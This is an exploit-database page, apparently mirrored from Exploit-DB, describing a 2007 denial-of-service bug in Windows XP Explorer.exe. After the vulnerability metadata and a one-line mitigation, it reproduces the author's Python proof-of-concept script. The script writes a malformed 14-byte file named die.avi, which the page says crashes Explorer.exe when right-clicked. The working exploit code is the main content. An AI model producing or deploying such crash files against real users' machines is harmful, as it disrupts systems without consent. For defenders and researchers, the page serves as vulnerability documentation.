header-logo
Suggest Exploit
vendor:
Windows XP
by:
shinnai
5.5
CVSS
MEDIUM
Denial of Service
CWE
Product Name: Windows XP
Affected Version From: 6.0.2900.2180
Affected Version To: 6.0.2900.2180
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows XP Professional SP2
2007

Explorer.exe version 6.0.2900.2180 .avi file Denial of Service

This exploit targets Explorer.exe version 6.0.2900.2180 using a specially crafted .avi file. It causes a denial of service by crashing the Explorer.exe process.

Mitigation:

Upgrade to a patched version of Explorer.exe or use alternative file explorers.
Source

Exploit-DB raw data:

print "-----------------------------------------------------------------------------------"
print "Explorer.exe version 6.0.2900.2180 .avi file Denial of Service"
print "author: shinnai"
print "mail: shinnai[at]autistici[dot]org"
print "site: http://shinnai.altervista.org"
print "Tested on Windows XP Professional SP2 all patched"
print "right click of the mouse on the file to see Explorer.exe die"
print "-----------------------------------------------------------------------------------"

fileOut = open('die.avi','wb')
fileOut.write('\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00')
fileOut.close()

# milw0rm.com [2007-01-24]

Navigation

Suggest Exploit

Services By CQR